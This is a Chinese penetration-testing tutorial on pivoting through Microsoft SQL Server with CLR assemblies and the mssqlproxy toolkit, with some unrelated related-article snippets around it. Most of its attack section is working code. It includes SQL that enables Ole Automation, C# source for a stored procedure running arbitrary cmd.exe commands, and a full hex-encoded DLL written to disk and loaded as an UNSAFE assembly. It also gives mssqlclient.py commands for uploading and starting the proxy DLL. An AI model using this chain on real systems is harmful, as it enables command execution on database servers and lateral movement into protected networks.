相关文章推荐
傲视众生的白开水  ·  resolution - Issue ...·  1 年前    · 

0x00 背景介绍

渗透测试中经常利用数据库连接突破 DMZ,前天看到有分享利用 MSSQL 搭建代理突破 DMZ 访问不出网的应用资产。Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。CLR 可以使用 .NET Framework 语言编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。

0x01 环境部署

数据库服务:

演示环境:Windows Server 2008 R2 Standard

测试机地址:192.168.3.174

MSSQL版本:Microsoft SQL Server 2012 - 11.0.2100.60 (X64)

歪果大佬遇到的场景为获取互联网侧服务器权限后,通过信息收集或者常规渗透控制 MSSQL 数据库。防火墙设置规则只允许1433端口通过,无法访问核心服务器,通过 MSSQL 数据库来构造代理,访问内部资源服务。

0x02 文件操作

开启 sp_OACreate

EXEC master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;
EXEC master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;
 

关闭 sp_OACreate

EXEC sp_configure 'show advanced options',1;reconfigure;
EXEC sp_configure 'ole automation procedures',0;reconfigure;
EXEC sp_configure 'show advanced options',0;reconfigure;
 
DECLARE @o int, @f int, @t int, @ret int
DECLARE @line varchar(8000)
EXEC sp_OACreate 'scripting.filesystemobject',@o out
EXEC sp_OAMethod @o, 'createtextfile', @f out, 'C:\windows\temp\c4.txt', 1
EXEC @ret = sp_OAMethod @f, 'writeline', NULL ,'C4'
 

0x03 命令执行

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;
public partial class StoredProcedures
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void cmd_exec (SqlString execCommand)
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
        proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();
        // Create the record and specify the metadata for the columns.
        SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
        // Mark the beginning of the result set.
        SqlContext.Pipe.SendResultsStart(record);
        // Set values for each column in the row
        record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());
        // Send the row back to the client.
        SqlContext.Pipe.SendResultsRow(record);
        // Mark the end of the result set.
        SqlContext.Pipe.SendResultsEnd();
        proc.WaitForExit();
        proc.Close();
 

使用 csc.exe 编译 dll 文件

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library d:\mssqlproxy\cmdexce.cs
 

写入编译的 dll 文件

DECLARE @ob INT;
EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;EXEC sp_OASetProperty @ob, 'Type', 1;
EXEC sp_OAMethod @ob, 'Open';EXEC sp_OAMethod @ob, 'Write', NULL, 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300f47e475e0000000000000000e00002210b010b000008000000060000000000005e270000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000042700005700000000400000a802000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e7465787400000064070000002000000008000000020000000000000000000000000000200000602e72737263000000a80200000040000000040000000a0000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000000e000000000000000000000000000040000042000000000000000000000000000000004027000000000000480000000200050028210000dc050000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013300500c30000000100001100730400000a0a066f0500000a72010000706f0600000a00066f0500000a72390000700f00280700000a280800000a6f0900000a00066f0500000a166f0a00000a00066f0500000a176f0b00000a00066f0c00000a26178d090000010c081672490000701f0c20a00f00006a730d00000aa208730e00000a0b280f00000a076f1000000a000716066f1100000a6f1200000a6f1300000a6f1400000a00280f00000a076f1500000a00280f00000a6f1600000a00066f1700000a00066f1800000a002a1e02281900000a2a0042534a4201000100000000000c00000076342e302e33303331390000000005006c000000e0010000237e00004c0200009402000023537472696e677300000000e0040000580000002355530038050000100000002347554944000000480500009400000023426c6f620000000000000002000001471502000900000000fa253300160000010000000f000000020000000200000001000000190000000300000001000000010000000300000000000a000100000000000600380031000a0060004b000600a50085000600c50085000a000701ec000e0030011d010e0038011d0106006e0131000a00bf01ec000a00cb013f000a00d501ec000a00e301ec000a00ee01ec0006001a02100206003a0210020000000001000000000001000100010010001700000005000100010050200000000096006a000a0001001f21000000008618730010000200000001007900190073001400210073001000290073001000310073001000310049011e00390057012300110064012800410075012c0039007c01230039008a01320039009e0132003100b9013700490073003b005900730043006100f6014a006900ff014f0031002702550079004502280009004f022800590058025a00690062024f0069007102100031008002100031008c02100009007300100020001b0019002e000b006a002e00130073006000048000000000000000000000000000000000e3000000040000000000000000000000010028000000000004000000000000000000000001003f000000000004000000000000000000000001003100000000000000003c4d6f64756c653e00636d645f657863652e646c6c0053746f72656450726f63656475726573006d73636f726c69620053797374656d004f626a6563740053797374656d2e446174610053797374656d2e446174612e53716c54797065730053716c537472696e6700636d645f65786563002e63746f720065786563436f6d6d616e640053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c69747941747472696275746500636d645f65786365004d6963726f736f66742e53716c5365727665722e5365727665720053716c50726f6365647572654174747269627574650053797374656d2e446961676e6f73746963730050726f636573730050726f636573735374617274496e666f006765745f5374617274496e666f007365745f46696c654e616d65006765745f56616c756500537472696e6700466f726d6174007365745f417267756d656e7473007365745f5573655368656c6c45786563757465007365745f52656469726563745374616e646172644f75747075740053746172740053716c4d657461446174610053716c4462547970650053716c446174615265636f72640053716c436f6e746578740053716c50697065006765745f506970650053656e64526573756c747353746172740053797374656d2e494f0053747265616d526561646572006765745f5374616e646172644f757470757400546578745265616465720052656164546f456e6400546f537472696e6700536574537472696e670053656e64526573756c7473526f770053656e64526573756c7473456e640057616974466f724578697400436c6f7365000000003743003a005c00570069006e0064006f00770073005c00530079007300740065006d00330032005c0063006d0064002e00650078006500000f20002f00430020007b0030007d00000d6f00750074007000750074000000a8d1b0181bae7940aee54017db44e16a0008b77a5c561934e0890500010111090320000104200101080401000000042000121d042001010e0320000e0500020e0e1c042001010203200002072003010e11290a062001011d1225040000123505200101122d042000123905200201080e0907031219122d1d12250801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f77730100002c27000000000000000000004e270000002000000000000000000000000000000000000000000000402700000000000000000000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff2500200010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000004c02000000000000000000004c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000000000000000000000000000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004ac010000010053007400720069006e006700460069006c00650049006e0066006f0000008801000001003000300030003000300034006200300000002c0002000100460069006c0065004400650073006300720069007000740069006f006e000000000020000000300008000100460069006c006500560065007200730069006f006e000000000030002e0030002e0030002e00300000003c000d00010049006e007400650072006e0061006c004e0061006d006500000063006d0064005f0065007800630065002e0064006c006c00000000002800020001004c006500670061006c0043006f00700079007200690067006800740000002000000044000d0001004f0072006900670069006e0061006c00460069006c0065006e0061006d006500000063006d0064005f0065007800630065002e0064006c006c0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000030002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000030002e0030002e0030002e0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000603700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000;
EXEC sp_OAMethod @ob, 'SaveToFile', NULL, 'c:\windows\temp\cmd_exec.dll', 2;
EXEC sp_OAMethod @ob, 'Close';E
XEC sp_OADestroy @ob;
 

执行系统命令

CREATE ASSEMBLY my_assembly
FROM 'C:\windows\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
cmd_exec 'ver'
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly
 

0x04 环境测试

python mssqlclient.py administrator@192.168.3.174 -windows-auth
 
upload reciclador.dll C:\windows\temp\reciclador.dll
 
python mssqlclient.py administrator@192.168.3.174 -windows-auth -install -clr assembly.dll
 
USE msdb;
SELECT      SCHEMA_NAME(so.[schema_id]) AS [schema_name], 
            af.file_id,              
            af.name + '.dll' as [file_name],
            asmbly.clr_name,
            asmbly.assembly_id,           
            asmbly.name AS [assembly_name], 
            am.assembly_class,
            am.assembly_method,
            so.object_id as [sp_object_id],
            so.name AS [sp_name],
            so.[type] as [sp_type],
            asmbly.permission_set_desc,
            asmbly.create_date,
            asmbly.modify_date,
            af.content                           
FROM        sys.assembly_modules am
INNER JOIN  sys.assemblies asmbly
ON        asmbly.assembly_id = am.assembly_id
INNER JOIN  sys.assembly_files af 
ON       asmbly.assembly_id = af.assembly_id 
INNER JOIN  sys.objects so
ON        so.[object_id] = am.[object_id]
 
python mssqlclient.py administrator@192.168.3.174 -windows-auth -check -reciclador "C:\windows\temp\reciclador.dll"
 
python mssqlclient.py administrator@192.168.3.174 -windows-auth -start -reciclador "C:\windows\temp\reciclador.dll"
 

https://github.com/blackarrowsec/mssqlproxy

https://www.blackarrow.net/mssqlproxy-pivoting-clr/

https://blog.netspi.com/attacking-sql-server-clr-assemblies/

0x00 背景介绍渗透测试中经常利用数据库连接突破 DMZ,前天看到有分享利用 MSSQL 搭建代理突破 DMZ 访问不出网的应用资产。Microsoft SQL Server 现在具备...
现在的PHP-CGI在IIS支持的不错,可以快整部署 在PHP网站下载编译的二进制包(PHP 7.0.6)解压就算安装完成了, 但在Linux下访问MSSQL2014非常容易,反而在Windows 平台下也没有合适的官方组件可使用(PHP 7.0.6没有MSSQL连接组件) 与是用C#编写了一个SocketServer进行数据库的读写操作 PHPService.cs 负责侦听 ClientService.cs 负责业务解析 DatabaseHelper.cs 负责数据库操作 安装成服务后PHP就可以通过socket访问了非常方便
• Linux 系统的防火墙: IP信息包过滤系统,它实际上由两个组件netfilter和iptables组成 • 主要工作在网络层,针对IP数据包。体现在对包内的IP地址、端口等信息的处理上 2、netfilter netfilter属于“内核态”(Kernel Space,又称为内核空间)的防火墙功能体系; 是内核的一部分,由一些数据包过滤表组成,这些表包含内核用来控制数据包过滤处理的规则集。 3、iptables iptables属于“用户态”(User Spac
mysql-proxy简介 mysql-proxy是mysql官方提供的mysql中间件服务,上游可接入若干个mysql-client,后端可连接若干个mysql-server。它使用mysql协议,任何使用mysql-client的上游无需修改任何代码,即可迁移至mysql-proxy上。mysql-proxy最基本的用法,就是作为一个请求拦截,请求中转的中间层: 进一步的,mysql-proxy可以分析与修改请求。拦截查询和修改结果,需要通过编写Lua脚本来完成。mysql-proxy允许用户指定L
访问控制列表(ACL)是一种基于包过滤的访问控制技术,它可以根据设定的条件对接口上的数据包进行过滤,允许其通过或丢弃。 访问控制列表被广泛地应用于路由器和三层交换机,借助于访问控制列表,可以有效地控制用户对网络访问,从而最大程度地保障网络安全。 虚拟终端(Virtual Teletype Terminal),用于实现远程登录路由器进行管理配置。 http://www.luyouqiwang.net/luyouqixiansu451.html
mssql代理 mssqlproxy是一个工具包,旨在通过套接字重用通过受损的Microsoft SQL Server在受限的环境中执行横向移动。客户端需要SQL Server上的和sysadmin特权。 在继续之前,请仔细阅读。 它包括三个部分: CLR汇编:编译assembly.cs 核心DLL :编译reciclador.sln 客户端:mssqlclient.py(基于Impacket的示例) 您可以编译库或从(x64)下载它们。 要生成核心DLL,只需将项目导入Visual Studio(reciclador.sln)并进行编译。 要生成CLR程序集,首先需要找到C#编译器: Get-ChildItem - Recurse " C:\Windows\Microsoft.NET\ " - Filter " csc.exe " | Sort-Object fullname
一般来说,不建议将 MySQL 数据库直接部署在 DMZ 区,因为 MySQL 数据库包含了大量的敏感信息,如用户密码、企业资产等。将 MySQL 数据库直接暴露在 DMZ 区域会增加数据库被攻击的风险。攻击者可以通过各种手段,比如利用漏洞、暴力破解等方式,尝试获取数据库的敏感信息,从而威胁企业的安全。 如果确实需要将 MySQL 数据库部署在 DMZ 区域,可以考虑采取以下措施: 1.使用防火墙进行保护:可以通过配置防火墙规则,限制只允许特定的 IP 地址或者端口访问 MySQL 数据库,以减少安全风险。 2.使用 VPN 或者 SSH 隧道进行访问:可以通过 VPN 或者 SSH 隧道等方式,在安全的内部网络访问 MySQL 数据库,从而保证数据库的安全性。 3.限制 MySQL 用户的权限:可以根据用户的职责和工作范围,按需分配权限,避免出现不必要的安全风险。 综上所述,在保证安全的前提下,可以将 MySQL 数据库部署在 DMZ 区,但是需要特别注意安全防护措施,并根据实际情况进行具体的安全策略。